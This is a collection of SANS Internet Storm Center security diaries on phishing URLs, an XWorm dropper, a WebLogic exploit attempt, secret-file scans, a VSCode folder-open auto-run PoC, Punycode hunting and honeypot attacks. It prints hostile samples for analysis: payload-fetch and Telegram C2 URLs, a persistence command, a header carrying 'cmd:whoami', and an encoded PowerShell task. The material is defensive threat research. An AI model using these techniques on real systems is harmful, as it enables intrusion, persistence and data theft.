So I have found one domain (wellnesscaremed) and one private IP address (192.168...). What I then like to do, is search for these keywords in the string list, like this:

If found extra IOCs: a UNC and a "malformed" URL. The URL has it's hostname followed by @ssl. This is not according to standards. @ can be used to introduce credentials, but then it has to come in front of the hostname, not behind it. So that's not the case here. More on this later.

Here are the results for the other document:

Notice that this time, we have @80.

I believe that this @ notation is used by Microsoft to provide the portnumber when WebDAV requests are made (via UNC). If you know more about this, please post a comment.

In an upcoming diary, I will show how to extract URLs from ZIP files embedded in the objects in these RTF files.

 

Didier Stevens
Senior handler
blog.DidierStevens.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

YARA-X's 1.13.0 release brings 4 improvements and 4 bugfixes.

Didier Stevens
Senior handler
blog.DidierStevens.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

For a few days, many phishing emails that landed into my mailbox contain strange URLs. They are classic emails asking you to open a document, verify your pending emails, …

But the format of the URLs is broken! In a URL, parameters are extra pieces of information added after a question mark (?) to tell a website more details about a request; they are written as name=value pairs (for example “email=user@domain”), and multiple parameters are separated by an ampersand (&).

Here are some examples of detected URLs:

hxxps://cooha0720[.]7407cyan[.]workers[.]dev/?dC=handlers@isc[.]sans[.]edu&*(Df
hxxps://calcec7[.]61minimal[.]workers[.]dev/?wia=handlers@isc[.]sans[.]edu&*(chgd
hxxps://couraol-02717[.]netlify[.]app/?dP=handlers@isc[.]sans[.]edu&*(TemP
hxxps://shiny-lab-a6ef[.]tcvtxt[.]workers.dev/?kpv=handlers@isc[.]sans[.]edu&*(lIi

You can see that the parameters are broken… “&*(Df” is invalid! It’s not an issue for browsers that will just ignore these malformed parameters, so the malicious website will be visited.

I did not see this for a while but it seems that the technique is back on stage. Threat actors implement this to break security controls. Many of them assume a “key=value" format. It may also break regex-based detectionn, URL normalization routines or IOC extraction pipelines…

Of course, we can track such URLs using a regex to extract the last param:

​​​​​​​

Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Today, I received an interesting email with a malicious attachment. When I had a look at the automatic scan results, it seemed to be a malicious script to create a Chrome Injector to steal data. Because InfoStealers are very common these days, it looked “legit” but there was something different. The .bat file looks to be a fork of the one found in many GitHub repositories[1].

When the regular script is completed, it jumps to :EndScript:

goto :EndScript

A call to :show_msgbox was added at the script end:

:EndScript
endlocal
call :show_msgbox
exit /b

Then, the magic begins. A payload is obfuscated with junk characters:

Very common techniques, the string is poluted with junk characters. It’s a chunk of Base64-encode data that is executed through a PowerShell:

It fetches a payload from hxxps://uniworldrivercruises-co[.]uk/optimized_MSI.png. This is a real picture:

But when some “fun” at the end. The next payload is delimited (and extracted) using the tags “BaseStart-” and “-BaseEnd”:

It’s a shell code that is invoked with the following parameters:

'==gN1V3dl5UQy8SZslmZvkGch9SbvNmLulWYyRGblhXaw9yL6MHc0RHa','0','C:\Users\Public\Downloads\','VHkaJZD8Iq','appidtel','1','appidtel','1','hxxp://178[.]16[.]53[.]209/buildingmoney.txt','C:\Users\Public\Downloads\','VHkaJZD8Iq','bat','1','0','4spTcCaYQA','0','','',''

The URL points to another payload. When I tried to decode it (it was Base64 encode and reversed), I could not automatically decode it because there was weird (non hex) characters in the string. Thanks to ChatGPT, I decoded it with the following piece of Python script:

from pathlib import Path
import re
import binascii

input_file = Path("payload.txt")
output_file = Path("payload.bin")

raw = input_file.read_bytes()
ascii_data = raw.decode("ascii", errors="ignore")

# Keep only hex characters!!
clean_hex = re.sub(r"[^0-9a-fA-F]", "", ascii_data)
if len(clean_hex) % 2 != 0:
    raise ValueError("Odd-length hex string after cleanup")

clean_hex = clean_hex[::-1]
binary = binascii.unhexlify(clean_hex)
output_file.write_bytes(binary)

print(f"[+] Decoded {len(binary)} bytes to {output_file}")

The decoded payload (SHA256:d99318c9b254b4fa5bf6f1dd15996dd50be0676dd84e822503fd273316eb9ba7) is a .Net program. It implements persistence through a scheduled task:

C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /tn "Chromiumx2" /tr "C:\Users\admin\AppData\Roaming\Chromiumx2.exe

And uses Telegram as C2:

hxxps://api[.]telegram[.]org/bot7409572452:AAGp8Ak5bqZu2IkEdggJaz2mnMYRTkTjv-U/sendMessage?chat_id=6870183115&text=%E2%98%A0%20%5BXWorm%20V7.0%20@XCoderTools%5D%0D%0A%0D%0ANew%20CLient%20:%20%0D%0ACAECEB6F4379122BA468%0D%0A%0D%0AUserName%20:%20admin%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20AMD%20Ryzen%205%203500%206-Core%20Processor%0D%0AGPU%20:%20Microsoft%20Basic%20Display%20Adapter%20%0D%0ARAM%20:%205.99%20GB%0D%0AGroup%20:%20XWorm%20V7.1

It's another piece of XWorm! Interesting way to drop the trojan in another malicious script...

[1] https://github.com/00nx/Chrome-App-Bound-Encryption-Bypass/blob/main/make.bat

Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Last week, a new AI agent framework was introduced to automate "live". It targets office work in particular, focusing on messaging and interacting with systems. The tool has gone viral not so much because of its features, which are similar to those of other agent frameworks, but because of a stream of security oversights in its design.

If you are looking to detect the use of OpenClaw in your environment, Knostic has created scripts to detect It, and, if you do want to use OpenClaw, to collect telemetry about its use.

openclaw-detect https://github.com/knostic/openclaw-detect

This script searches the system for filenames commonly associated with OpenClaw. For example, the presence of the state directory ~/.openclaw or for a Docker container running openclaw. If you have decent endpoint monitoring, this tool may not be needed, but it can give you some hints on which files to look for.

openclaw-telemetry https://github.com/knostic/openclaw-telemetry

If you do run OpenClaw, openclaw-detect will add additional meaningful logging. The tool captures "every tool call, LLM request, and agent session — with built-in redaction, tamper-proof hash chains, syslog/SIEM forwarding, and rate limiting". It is an OpenClaw plugin and installs like any other OpenClaw plugin

In addition, there are a few additional security tools and tips:

• The OpenClaw documentation now has a dedicated security section: https://docs.openclaw.ai/gateway/security
• OpenClaw's documentation explains how to set up OpenClaw inside a Docker sandbox: https://docs.openclaw.ai/cli/sandbox.
• Do not provide OpenClaw with access to accounts you intend to lose.
• Do not expose OpenClaw to the Internet
• ACIP, the "Advanced Cognitive Inoculation Prompt", has a version for OpenClaw that intends to limit prompt injection. https://github.com/Dicklesworthstone/acip/tree/main/integrations/clawdbot

--
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Yesterday, a single IP address (%%ip:204.76.203.210%%) scanned a number of our sensors for what looks like an anthropic API node. The IP address is known to be a Tor exit node.

The requests are pretty simple:

GET /anthropic/v1/models
Host: 67.171.182.193:8000
X-Api-Key: password
Anthropic-Version: 2023-06-01

It looks like this is scanning for locally hosted Anthropic models, but it is not clear to me if this would be successful. If anyone has any insights, please let me know. The API Key is a commonly used key in documentation, and not a key that anybody would expect to work.

At the same time, we are also seeing a small increase in requests for "/v1/messages". These requests have been more common in the past, but the URL may be associated with Anthropic (it is, however, somewhat generic, and it is likely other APIs use the same endpoint. These requests originate from %%ip:154.83.103.179%%, an IP address with a bit a complex geolocation and routing footprint.

--
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Charlie, one of our readers, has forwarded an interesting phishing email. The email was sent to users of the Vivladi Webmail service. While not overly convincing, the email is likely sufficient to trick a non-empty group of users:

The e-mail gets more interesting as the user clicks on the link. The link points to Google Documents and displays a slide show:

Usually, Google Docs displays a footer notice that warns viewers about phishing sites and offers a "reporting" link if a page is used for phishing. Bots are missing in this case. At first, I suspected some HTML/JavaScript/CSS tricks, but it turns out that this isn't a bug; it is a feature!

Usually, if a user shares slides, the document opens in an "edit" window. This can be avoided by replacing "edit" with "preview" in the URL, but the footer still makes it obvious that this is a set of slides. To remove the footer, the slides have to be "published," and the resulting link must be shared. When publishing, the slides will auto-advance. But for a one-slide slideshow, this isn't an issue. There is also a setting to delay the advance. Here are some sample links:

[These links point to a simple sample presentation I created, not the phishing version.]

Normal Share:

https://docs.google.com/presentation/d/1Quzd6bbuPlIcTOorlUDzSuJCXiOyqBTSHczo6hnXcac/edit?usp=sharing

Preview Share:

https://docs.google.com/presentation/d/1Quzd6bbuPlIcTOorlUDzSuJCXiOyqBTSHczo6hnXcac/preview?usp=sharing

Publish Share:

https://docs.google.com/presentation/d/e/2PACX-1vRaoBusJAaIoVcNbGsfVyE0OuTP1dS-2Po9lpAN9GGy2EkbZG_oR9maZDS7cq2xW_QeiF8he457hq3_/pub?start=false&loop=false&delayms=30000

The URL parameters in the last link do not start the presentations, nor loop them, and delay the next slide by 30 seconds.

The Vivaldi webmail phishing ended up on a "classic" phishing login form that was created using Square. So far, this form is still visible at

hxxps [:] //vivaldiwebmailaccountsservices[.]weeblysite[.]com

???????

 

 

--
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

I was looking for possible exploitation of CVE-2026-21962, a recently patched WebLogic vulnerability. While looking for related exploit attempts in our data, I came across the following request:

GET /weblogic//weblogic/..;/bea_wls_internal/ProxyServlet
host: 71.126.165.182
user-agent: Mozilla/5.0 (compatible; Exploit/1.0)
accept-encoding: gzip, deflate
accept: */*
connection: close
wl-proxy-client-ip: 127.0.0.1;Y21kOndob2FtaQ==
proxy-client-ip: 127.0.0.1;Y21kOndob2FtaQ==
x-forwarded-for: 127.0.0.1;Y21kOndob2FtaQ==

According to write-ups about CVE-2026-21962, this request is related [2]. However, the vulnerability also matched an earlier "AI Slop" PoC [3][4]. Another write-up, that also sounds very AI-influenced, suggests a very different exploit mechanism that does not match the request above [5].

The source IP is 193.24.123.42. Our data shows sporadic HTTP scans for this IP address, and it appears to be located in Russia. Not terribly remarkable at that. In the past, the IP has used the "Claudbot" user-agent. But it does not have any actual affiliation with Anthropic (not to be confused with the recent news about clawdbot). 

The exploit is a bit odd. First of all, it does use the loopback address as an "X-Forwarded-For" address. This is a common trick to bypass access restrictions (I would think that Oracle is a bit better than to fall for a simple issue like that). There is an option to list multiple IPs, but they should be delimited by a comma, not a semicolon. 

The base64 encoded string decodes to: "cmd:whoami". This suggests a simple command injection vulnerability. Possibly, the content of the header is base64 decoded and next, passed as a command line argument?? Certainly an odd mix of encodings in one header, and unlikely to work.

Let's hope this is AI slop and the exploit isn't that easy. We have seen a significant uptick in requests, including the wl-proxy-client-ip header, starting on January 21st, but the header has been used before. It is a typical exploit AI may come up with, seeing keywords like "Weblogic Server Proxy Plug-in".

I asked ChatGPT and Grok if this is an exploit or AI slop. The abbreviated answer:

ChatGPT: "This looks more like a “scanner/probe that’s trying to look like an exploit” than a complete, working exploit by itself — but it’s not random either. It’s borrowing real WebLogic attack ingredients."

Grok: "This is an actual exploit attempt — not just random "AI slop" or nonsense traffic."

​​​​​​​Google Gemini: "That is definitely an actual exploit attempt, not AI slop. Specifically, it is targeting a well-known vulnerability in Oracle WebLogic Server."

[1] https://nvd.nist.gov/vuln/detail/CVE-2026-21962
[2] https://dbugs.ptsecurity.com/vulnerability/PT-2026-3709
[3] https://x.com/0xacb/status/2015473216844620280
[4] https://github.com/Ashwesker/Ashwesker-CVE-2026-21962/blob/main/CVE-2026-21962.py
[5] https://www.penligent.ai/hackinglabs/the-ghost-in-the-middle-a-definitive-technical-analysis-of-cve-2026-21962-and-its-existential-threat-to-ai-pipelines/

--
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

[This is a Guest Diary by Fares Azhari, an ISC intern as part of the SANS.edu BACS program]

Romance scams are a form of social-engineering fraud that causes both financial and emotional harm. They vary in technique and platform, but most follow the same high-level roadmap: initial contact, relationship building, financial exploitation. In this blog post I focus on the initial stages of the romance scam ? how scammers make contact, build rapport, and prime victims for later financial requests.

I was contacted by two separate romance scammers on WhatsApp. I acted like a victim falling for their scam and spent around two weeks texting each one. This allowed me to observe the first few phases, which we discuss below. I was not able to reach the monetization phase, as that often takes months and I could not maintain the daily time investment needed to convince the scammers I was fully falling for it.

The scammers claimed to be called ?Chloe? and ?Verna?. We use these names throughout to differentiate their messages. Snippets from each are included to illustrate the phases, along with my precursor or response messages.

Phase 1: Initial contact

Both conversations began the same way ? the sender claimed they had messaged the wrong person.

Verna:

Chloe:

That ?wrong-number? ruse is low effort and high reward. It gives the out-of-the-blue message a plausible reason, invites a short helpful reply, and lowers suspicion. Two small but useful fingerprints appear immediately: random capitalization and awkward grammar. These recur later and help identify when different operators are involved.

Phase 2: The immediate hook

If you reply politely, the scammer usually responds with an over-the-top compliment:

Verna:

Chloe:

These short flattering lines serve as rapid rapport builders ? they feel personal and disarming.

Phase 3: Establishing identity and credibility

After a few messages, both claimed to be foreigners working in the UK:

Verna:

When asked what she does for a living:

When asked to explain her job:

Chloe:

When asked how COVID affected her life:

When asked about her job:

When asked what made her choose business:

Both claim the same job ? Business Analyst ? which later supports credibility when discussing investments. Claiming to be foreigners explains grammatical errors and factual mistakes about the UK. Notably, job descriptions are long and well-written, lacking earlier quirks ? suggesting prewritten, copy-pasted content. This points to a playbook: flatter the target, establish credibility with occupation and location cover, then use scripted replies where legitimacy matters.

Phase 4: The hand-off

After a few days of texting, both explained they were using a business number and asked to move to a ?personal? one:

Verna:

After I said it didn?t bother me to switch:

Chloe:

After the switch:

The excuse is plausible and low-friction. Once texting the new number, writing style often changes ? a strong sign of a hand-off to a different operator or team focused on long-term grooming.

Phase 5: The grooming phase (signs of a different operator)

The writing style shift is clear on the new numbers:

Verna:

When asked if she made friends at work:

When asked to share a steak recipe:

Chloe:

When asked what languages she speaks:

When asked about her studies:

When asked about work stress:

Responses show weaker English: more basic grammar errors, shorter sentences, quicker replies, daily ?Good morning? routines, and frequent (likely stolen or AI-generated) photos. These changes strongly indicate a hand-off.

Phase 6: Credibility building

By the second week both began describing financial success and sent images of cars, apartments, gym visits, and meals to build trust:

Verna:

Pictures sent when asked about her side hustle:

When asked if investments are high risk:

When asked how she chooses investments:

Photo sent saying she finished work (face covered):

Chloe:

When asked about plans for her 30s:

When asked about foundations/programs:

Property photo (Australia):

Both positioned themselves as successful investors with diversified portfolios ? building trust for future proposals. The wealth, charity, and expertise narratives emotionally prime the target. Direct money requests usually come much later, after deep emotional commitment.

Practical advice for readers

• If you receive a random ?wrong number? message, be cautious ? do not share personal information.
• Be suspicious if someone quickly asks to move off-platform or to a new number. Stay on the original platform until identity is verified.
• Ask for a live video call ? repeated refusal is a major red flag.
• Reverse-image search any profile photos or images received.
• Never send money, gift cards, or personal documents to someone you only know online.

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Based on the sensors reporting to ISC, this activity started on the 13 Jan 2026. My own sensor started seeing the first scan on the 21 Jan 2026 with limited probes. So far, this activity has been limited to a few scans based on the reports available in ISC [5] (select Match Partial URL and Draw):

This is a sample list of the directories actors are scanning for using the following patterns:

/$(pwd)/.env.staging
/$(pwd)/.env.development
/$(pwd)/.env.production
/$(pwd)/.env.local
/$(pwd)/.env
$(pwd)/terraform.tfstate
/$(pwd)/docker-compose.yml
/$(pwd)/netlify.toml

This Gephi graph shows the relationship of each probed URL by the two IP addresses:

Kibana ES|QL Query

FROM cowrie* 
| WHERE event.reference == "no match"
| KEEP related.ip,http.request.body.content
| WHERE http.request.body.content IS NOT NULL
| WHERE http.request.body.content RLIKE ".*\\/\\$\\(pwd\\).*"
| STATS COUNT(http.request.body.content) BY related.ip, http.request.body.content

Indicators

By selecting one of these two indicators, it shows their scanning activity for the /$(pwd)/ pattern in the ISC web logs.

185.177.72.52
185.177.72.23

We also appreciate feedback and suggestions about what tool is used to perform these scans. Please use our contact page to provide feedback. 

[1] https://www.elastic.co/guide/en/elasticsearch/reference/8.19/esql-using.html
[2] https://gephi.org/
[3] https://isc.sans.edu/weblogs/sourcedetails.html?date=2026-01-21&ip=185.177.72.52
[4] https://isc.sans.edu/weblogs/sourcedetails.html?date=2026-01-25&ip=185.177.72.23
[5] https://isc.sans.edu/weblogs/urlhistory.html?url=LyQocHdkKS8uCg==

-----------
Guy Bruneau IPSS Inc.
My GitHub Page
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

The title of this diary is perhaps a bit catchy but the question is important. I don’t consider myself as a good developer. That’s not my day job and I’m writing code to improve my daily tasks. I like to say “I’m writing sh*ty code! It works for me, no warranty that it will for for you”. Today, most of my code (the skeleton of the program) is generated by AI, probably like most of you.

My daily morning routing is to follow RSS feeds, news and today I spotted an interesting tool called “Bandit”[1]. It’s a tool designed to find common security issues in Python code. Because I’m mainly writing Python code, it made me curious to test it.

I use regularly a Python script that was 99% generated by AI. I just made some adjustments but all the core features have been generated. This script was good candidate to be analyzed by Bandit because:

• It has a decent size (1500 lines)
• It uses many dependences (Python libraries)
• It is multi-threaded for performance
• It collects data from online resources (network interactions)

Bandit is super easy to use, first download the Docker image (good to know, images are signed!):

docker pull ghcr.io/pycqa/bandit/bandit

Now, scan your code:

docker run -it --rm -v $(pwd):/data ghcr.io/pycqa/bandit/bandit --severity-level all -v /data/myscript.py

Here are the scan results for my script:

Total issues (by severity):
    Undefined: 0
    Low: 13
    Medium: 1
    High: 0
Total issues (by confidence):
    Undefined: 0
    Low: 0
    Medium: 0
    High: 14

The following table shows what has been spotted in the code (I grouped them)

Issue	Severity	Confidence	Reference	Occurences
Consider possible security implications associated with the subprocess module	Low	High	https://cwe.mitre.org/data/definitions/78.html	1
Using xml.etree.ElementTree.fromstring to parse untrusted XML data is known to be vulnerable to XML attacks. Replace xml.etree.ElementTree.fromstring with its defusedxml equivalent function or make sure defusedxml.defuse_stdlib() is called	Medium	High	https://cwe.mitre.org/data/definitions/20.html	2
subprocess call - check for execution of untrusted input	Low	High	https://cwe.mitre.org/data/definitions/78.html	3
Standard pseudo-random generators are not suitable for security/cryptographic purposes	Low	High	https://cwe.mitre.org/data/definitions/330.html	1
Try, Except, Pass detected	Low	High	https://cwe.mitre.org/data/definitions/703.html	7

Like any vulnerability scan, results must be interpreted and put back in the environment where the code is executed. In my case, the script is running internally with trusted set of (XML) data so I consider the results as "good". Now, if you application is facing the Internet and publiclly available, that's another story!

If you are curious about the tests performed by Bandit, the list of plugins is availabe in the documentation[2].

Conclusion: the AI-generated script looks not too bad. Tip: when writing your prompt to generate the initial code, don't forget to mention that "security is very important" like:

Generate production-quality Python code with a security-first approach.
Requirements:
- Treat all external input as untrusted
- Validate input types, length, and format
- Sanitize strings (e.g., for file paths, URLs, commands, JSON, CSV)
- Use explicit allow-lists where possible
- Handle errors with clear exceptions (no silent failures)
- Avoid dangerous functions (eval, exec, os.system, shell=True)
- Prevent command injection, path traversal, and deserialization issues
- Use safe libraries and best practices
- Include input validation helpers if needed

[1] https://github.com/PyCQA/bandit
[2] https://bandit.readthedocs.io/en/latest/plugins/index.html

Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Visual Studio Code is a popular open-source code editor[1]. But it’s much more than a simple editor, it’s a complete development platform that supports many languages and it is available on multiple platforms. Used by developers worldwide, it’s a juicy target for threat actors because it can be extended with extensions.

Of course, it became a new playground for bad guys and malicious extensions were already discovered multiple times, like the 'Dracula Official' theme[2]. Their modus-operandi is always the same: they take the legitimate extension and include scripts that perform malicious actions.

VSCode has also many features that help developers in their day to day job. One of them is the execution of automatic tasks on specific events. Think about the automatic macro execution in Microsoft Office.

With VSCode, it’s easy to implement and it’s based on a simple JSON file. Create in your project directory a sub-directory ".vscode" and, inside this one, create a “tasks.json”. Here is an example:

PS C:\temp\MyProject> cat .\.vscode\tasks.json
{
  "version": "2.0.0",
  "tasks": [
    {
      "label": “ISC PoC,
      "type": "shell",
      "command": "powershell",
      "args": [
        "-NoProfile",
        "-ExecutionPolicy", "Bypass",
        "-EncodedCommand",
      "QQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgAFAAcgBlAHMAZQBuAHQAYQB0AGkAbwBuAEYAcgBhAG0AZQB3AG8AcgBrADsAIABbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcASQAgAGEAbQAgAG4AbwB0ACAAbQBhAGwAaQBjAGkAbwB1AHMAIQAgAH0AOgAtAD4AJwAsACAAJwBJAFMAQwAgAFAAbwBDACcAKQAgAHwAIABPAHUAdAAtAE4AdQBsAGwA"
      ],
      "problemMatcher": [],
      "runOptions": {
        "runOn": "folderOpen"
      },
    }
  ]
}

The key element in this JSON file is the "runOn" method: The script will be triggered when the folder will be opened by VSCode.

If you see some Base64 encode stuff, you can imagine that some obfuscation is in place. Now, launch VSCode from the project directory and you should see this:

The Base64 data is just this code:

Add-Type -AssemblyName PresentationFramework; [System.Windows.MessageBox]::Show('I am not malicious! }:->', 'ISC PoC') | Out-Null

This technique has already been implemented by some threat actors![3]!

Be careful if you see some unexpected ".vscode" directories!

[1] https://code.visualstudio.com
[2] https://www.bleepingcomputer.com/news/security/malicious-vscode-extensions-with-millions-of-installs-discovered/
[3] https://redasgard.com/blog/hunting-lazarus-contagious-interview-c2-infrastructure

Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

IDNs or “International Domain Names” have been with us for a while now (see RFC3490[1]). They are (ab)used in many attack scenarios because.. it works! Who can immediately spot the difference between:

https://youtube.com/

And:

https://youtube.com/

The magic is to replace classic characters by others that look almost the same. In the example above, the letter “o” has been replaced by Greek character “o”.

If they are very efficient for attackers, they remain below the radar in many organizations. To avoid issues when printing unusual characters, Punycode[2] helps to encode them in plain characters. The example above will be encoded as:

xn--yutube-wqf.com

This format is based on:

• “xn--“ : the common prefix for all IDNs requests.
• “yutube.com”: The normal ASCII characters
• “wqf” : The Punycode encoded version of the Unicode character

Python can decode them easily:

$ python3
Python 3.12.3 (main, Jan  8 2026, 11:30:50) [GCC 13.3.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> domain = "xn--yutube-wqf.com"
>>> decoded = domain.encode("ascii").decode("idna")
>>> print(decoded)
y?utube.com
>>> for c in decoded:
...     print(f"{c} -> {ord(c)}")
...
y -> 121
? -> 1086
u -> 117
t -> 116
u -> 117
b -> 98
e -> 101
. -> 46
c -> 99
o -> 111
m -> 109
>>>

You can see the value of “o” is not “usual” (not in the ASCII range). They are plenty of online tools that can (de|en)code Punycode[3].

If not all IDNs are suspicious, they are not very common and deserve some searches in your logs. If you already collect your DNS resolver logs (I hope you do!), it’s easy to search for such domains:

$ grep "xn--" queries.log*
queries.log:19-Jan-2026 19:54:38.399 queries: info: client @0x999999999999 192.168.255.13#47099 (in.xn--b1akcbzf.xn--90amc.xn--p1acf): query: in.xn--b1akcbzf.xn--90amc.xn--p1acf IN A +E(0) (192.168.254.8)
queries.log:20-Jan-2026 04:38:25.877 queries: info: client @0x999999999999 192.168.255.13#49850 (in.xn--b1akcbzf.xn--90amc.xn--p1acf): query: in.xn--b1akcbzf.xn--90amc.xn--p1acf IN A +E(0) (192.168.254.8)
queries.log.0:18-Jan-2026 15:22:11.741 queries: info: client @0x9999999999 192.168.255.13#60763 (in.xn--b1akcbzf.xn--90amc.xn--p1acf): query: in.xn--b1akcbzf.xn--90amc.xn--p1acf IN A +E(0) (192.168.254.8)
queries.log.0:18-Jan-2026 17:27:23.127 queries: info: client @0x99999999999 192.168.255.13#44141 (in.xn--b1akcbzf.xn--90amc.xn--p1acf): query: in.xn--b1akcbzf.xn--90amc.xn--p1acf IN A +E(0) (192.168.254.8)
queries.log.0:18-Jan-2026 22:54:36.841 queries: info: client @0x99999999999 192.168.255.13#35963 (in.xn--b1akcbzf.xn--90amc.xn--p1acf): query: in.xn--b1akcbzf.xn--90amc.xn--p1acf IN A +E(0) (192.168.254.8)

The detected Punycode domain is decoded to: 

Another good proof that DNS is a goldmine for threat hunting!

[1] https://datatracker.ietf.org/doc/html/rfc3490
[2] https://en.wikipedia.org/wiki/Punycode
[3] https://regery.com/en/domains/tools/punycode-decoder

Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

I've seen many API requests for different LLMs in the honeypot logs.

Like this one:

The prompt is always the same: "How many states are there in the United States?".

This is recon to find open LLMs. Not necessarily to exploit them, but to use them.

Coincidentally, something similar has been reported in the news: "Hackers target misconfigured proxies to access paid LLM services"

Make sure your LLMs are not exposed to the Internet without authentication.

 

Didier Stevens
Senior handler
blog.DidierStevens.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Wireshark release 4.6.3 fixes 4 vulnerabilities and 9 bugs.

Didier Stevens
Senior handler
blog.DidierStevens.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

[This is a Guest Diary by Matthew Presnal, an ISC intern as part of the SANS.edu BACS program]

Cryptojacking and botnets can pose a greater threat than a simple drain of resources. These organizations have been known to engage in “DDoS for Hire” or even selling off footholds, acting as Initial Access Brokers (IABs). To better understand how to get ahead of the adversary, I am going to walk you through the real-world attacks observed on my DShield honeypot and attempt to better predict their next steps.

Early Recognition

As we know from a certain company's model for stopping attacks (I'll let you fill in the blanks), the earlier you are able to break the chain, the better the outcome. While the ideal situation is to have impenetrable defenses, thus making it so you have nothing to worry about, that is just not realistic. If we are able to recognize early signs of a potential attack, i.e recon, we can posture or even preempt the attack by implementing hardening that we may otherwise avoid due to operational impact.

The screenshot below is from recent activity observed on my honeypot. In this instance, the IP points back to a Digital Ocean machine, but I have numerous other accounts of this exact script being run to enumerate the system from several other IPs outside of this range.

In the interest of readability, I have supplied the enumeration script here:

At this stage, the threat actor already has access (this resulted from SSH spraying), and they are enumerating the machine for kernel info, system architecture, uptime, CPU model and capabilities, GPU info, binary versions, and login info. They then output all of this information in a standardized format to be parsed, either via an automated process or handed off to someone to start building persistence/determining if the system is suitable for the botnet.

In a real environment recognizing this as a potential adversarial first step does a few different things for us in addition to activating the Incident Response Plan (IRP):

1. It gives us the opportunity to ensure adequate coverage of the network
2. An opportunity to start diverting traffic away from a known compromised machine and introducing isolation/quarantining the machine
3. The ability to “play by play” adversarial actions and build detection rules that can be implemented across the network
4. Roll out hardening tailored to the adversarial activity to enact the “Pyramid of Pain” at the TTP level (Bonus points if you are able to attribute the attack real-time)

Actions on Objective

The attack chain below was witnessed on the same honeypot, and I believe it to be part of the same “run book” presumably carried out by the cryptojacking and botnet organization “Outlaw":

Actor IP: 197.221.232.44
Kibana GeoIP: Harare, Zimbabwe

The first several lines of this chain are more enumeration and situational awareness, gathering more system info, user info, processes, and even which users are logged in with the ‘w’ command. The first real exploitation action starts with the recursive remove command, prepping the system for the SSH persistence mechanism Outlaw is known for.

Malware

In the interest of brevity, this section will not go into any real depth but will rather attempt to further flesh out the post-exploitation phase of the attack. As you can see in the screenshots below, the hash of the malware downloaded on the honeypot is identified as a Trojan and a Miner, and it has references to a ‘zombie’ within the strings of the code itself suggesting likely botnet involvement.

